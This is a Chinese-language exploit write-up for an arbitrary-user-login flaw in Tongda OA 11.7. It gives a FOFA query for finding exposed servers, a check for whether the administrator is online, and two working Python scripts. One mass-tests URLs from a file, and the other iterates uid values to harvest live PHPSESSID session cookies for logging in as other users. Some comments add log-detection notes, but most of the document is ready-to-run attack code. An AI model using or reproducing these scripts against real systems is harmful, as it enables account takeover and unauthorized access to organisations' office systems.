0x00 前言
通達OA V11.7版本存在任意用戶登錄漏洞,該漏洞需要管理員在線才可以登錄系統;另外一個方面就是遍歷在線的uid值進行判斷。
具體fofa語法放在下面:
app="TDXK-通達OA"
0x01 在線用戶判斷
訪問 :
http://xxx.xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
如果頁面是空白的,則說明管理員在線,即可以利用
如果顯示RELOGIN,則不可以利用
0x02 任意用戶登錄
獲取到uid=1的cookie
同時訪問即可進行登錄后台:
0x03 POC檢測腳本
通過遍歷uid的值,判斷用戶是否上線過,實現任意用戶登錄,同時感謝大佬的腳本,更改了一下批量測試腳本:
import requests
import sys
import random
import re
import time
import threading
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
    """Print the four-line banner (version and usage) shown before any check runs."""
    rule = '+------------------------------------------'
    banner = (
        rule,
        '+ \033[34mVersion: 通達OA 11.7 ',
        '+ \033[34mVersion: 用法:python3 poc.py http://xxx.xxx.xxx.xxx/ ',
        rule,
    )
    # One write; identical bytes on stdout to four separate print() calls.
    print('\n'.join(banner))
def POC_1(target_url):
    """Probe one target for the "admin (uid 1) is online" condition described above.

    Sends a single GET to ``/mobile/auth_mobi.php`` with ``isAvatar=1``,
    ``uid=1`` and ``P_VER=0`` appended to *target_url* and classifies the
    reply on its body alone:

    * ``RELOGIN`` in a 200 body -> uid 1 is offline; a red ``[x]`` line is printed.
    * empty 200 body            -> uid 1 is treated as online; the first
      ``PHPSESSID`` found in the stringified response headers is printed.
    * anything else             -> a failure line is printed and ``sys.exit(0)``
      is called.

    Any ``Exception`` (connection error, timeout, or ``IndexError`` when no
    ``PHPSESSID`` cookie is present) is caught and printed. Nothing is returned.

    Detection note: on the server side this probe is one unauthenticated GET
    to the path/query above carrying the fixed Chrome 86 User-Agent below, so
    that path+query from a client that never authenticated is a usable log
    indicator.
    """
    vuln_url = target_url + "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        # verify=False below would otherwise emit an InsecureRequestWarning per request.
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        if "RELOGIN" in response.text and response.status_code == 200:
            print(target_url.replace("\n","") +"\033[31m[x] 目標用戶為下線狀態 --- {}\033[0m".format(time.asctime( time.localtime(time.time()))))
        elif response.status_code == 200 and response.text == "":
            # Regex over str(headers) picks the first PHPSESSID value; an empty
            # match list makes PHPSESSION[0] raise IndexError (caught below).
            PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(response.headers))
            print(target_url.replace("\n","") + "\033[32m[o] 用戶上線 PHPSESSION: {} --- {}\033[0m".format(PHPSESSION[0] ,time.asctime(time.localtime(time.time()))))
        else:
            print("\033[31m[x] 請求失敗,目標可能不存在漏洞")
            # SystemExit is not an Exception subclass, so the handler below
            # does not catch it; raised on a worker thread (see __main__) it
            # ends only that thread.
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 請求失敗 \033[0m", e)
if __name__ == '__main__':
    title()
    # Single-target interactive loop, left disabled in favour of the batch mode below.
    # target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    # while True:
    #     POC_1(target_url)
    #     time.sleep(5)
    # Batch check: one target URL per line of url.txt in the current directory.
    # The file handle is never closed explicitly.
    for url in open("url.txt"):
        # POC_1(url)
        # One thread per target, started and never joined: the main thread
        # falls off the end while probes may still be running, and the printed
        # lines from different targets may interleave.
        t1 = threading.Thread(target=POC_1, args=(url.replace("\n", ""),))
        t1.start()
網上師傅的腳本:
import requests
from bs4 import BeautifulSoup
import sys
import re
# Target base URL is the first command-line argument; no validation is performed.
url = sys.argv[1]
# Walk uid values 1..9999 and stop at the first one whose auth_mobi.php reply
# does not contain RELOGIN (treated as "online"), printing the first PHPSESSID
# found in the stringified response headers.
# Detection note: the resulting log signature is a sequential sweep of
# uid=1,2,3,... against this one path from a single unauthenticated client.
for i in range(1,10000):
    try :
        vuln_url = url + "/mobile/auth_mobi.php?isAvatar=1&uid="+str(i)+"&P_VER=0"
        # Plain GET: no custom headers, no timeout, default certificate verification.
        resp = requests.get(vuln_url)
        # BeautifulSoup is used only to strip markup before the substring test.
        soup = BeautifulSoup(resp.text,'html.parser')
        if 'RELOGIN' in soup.get_text():
            print("不存在")
        else:
            # An empty match list makes PHPSESSION[0] raise IndexError, which
            # the bare except below turns into a silent end of the scan.
            PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(resp.headers))
            print('uid='+str(i)+"在線"+"對應的COOKIE值是:PHPSESSID="+str(PHPSESSION[0]))
            break
    # Bare except catches BaseException too, so a connection failure, an
    # IndexError or a KeyboardInterrupt all end the loop without any message.
    except:
        break